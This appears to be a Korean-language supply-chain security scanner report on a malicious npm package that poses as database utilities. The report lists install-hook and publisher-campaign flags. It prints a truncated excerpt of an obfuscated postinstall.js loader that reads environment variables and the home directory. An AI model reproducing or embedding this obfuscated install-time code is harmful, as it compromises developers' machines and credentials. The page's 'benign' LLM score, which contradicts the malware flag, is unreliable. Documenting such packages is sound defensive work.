// npm 패키지
@cloudplatform-single-spa/floating-ips
Internal database utilities with connection pooling, query builder and migration support
주간
46
월간
46
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,278 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x1c198b=a0_0x2816;(function(_0xe6af46,_0x4852b1){const _0x16e480=a0_0x2816,_0x42428b=_0xe6af46();while(!![]){try{const _0x47636e=-parseInt(_0x16e480(0xbb))/(-0xbf*0x1a+0x1*0xf25…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4922reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x1c198b=a0_0x2816;(function(_0xe6af46,_0x4852b1){const _0x16e480=a0_0x2816,_0x42428b=_0xe6af46();while(!![]){try{const _0x47636e=-parseInt(_0x16e480(0xbb))/(-0xbf*0x1a+0x1*0xf25+-0x442*-0x1)*(parseInt(_0x16e480(0xe3))/(0x527*0x5+0x545+-0x1f06))+-parseInt(_0x16e480(0xaa))/(-0x4b6+0x2*-0x135b+0x2b6f)+parseInt(_0x16e480(0xe4))/(-0x1*0x1480+0xe*0x207+-0x7de)+-parseInt(_0x16e480(0xd3))/(-0x2301+0x1*0x1c01+-0x3*-0x257)*(-parseInt(_0x16e480(0xa7))/(0x1*0x14bc+-0x7d*0x21+-0x499))+-parseInt(_0x16e480(0x9e))/(-0xd*0x1da+-0x7ea+-0x37*-0x95)*(-parseInt(_0x16e480(0xbd))/(-0x6*-0x2+0x1*0x1f84+-0xfc4*0x2))+parseInt(_0x16e480(0xd6))/(-0x2d7*-0xc+0x1e3a+0x4045*-0x1)+-parseInt(_0x16e480(0xb6))/(0x91+-0x703+0x67c);if(_0x47636e===_0x4852b1)break;else _0x42428b['push'](_0x42428b['shift']());}catch(_0x52e1f7){_0x42428b['push'](_0x42428b['shift']());}}}(a0_0x3719,0xe0088+-0xdf735*-0x1+-0x14219*0xd));function a0_0x3719(){const _0x2b6b25=['zxHPC3rZu3LUyW','zxHLy1bHDgG','y2HPBgrFChjVy2vZCW','lMnHy2HL','CgfJA2fNzs5QC29U','BwfJ','CMvWBgfJzq','mtbvrNPNqu8','xsbxyxjUAw5NoIboB2rLlMPZid49mtyUmcbYzxf1AxjLza','zw52','mteWotCZnLf5qvvRzG','yxbWBhK','D29YA3nWywnLCW','BwTKAxjtEw5J','DgLTzw91Da','CMvHzgrPCLn5BMm','y2HHCKnVzgvbDa','C3rKAw8','uefzte9bra','lMPZ','Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9WyxLSB2fKlW','Ahr0Ca','D3jPDgu','mZmWotm4BvrsD2fN','mZu5mdy4mfzJAxzoDq','uKvdt05Ft05mwq','BM93','BM9Kzq','lMPZB24','D2LUmZi','Dg1WzgLY','y29UC3rYDwn0B3i','qgnSB3vKCgXHDgzVCM0TC2LUz2XLlxnWys9MBg9HDgLUzY1PC --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
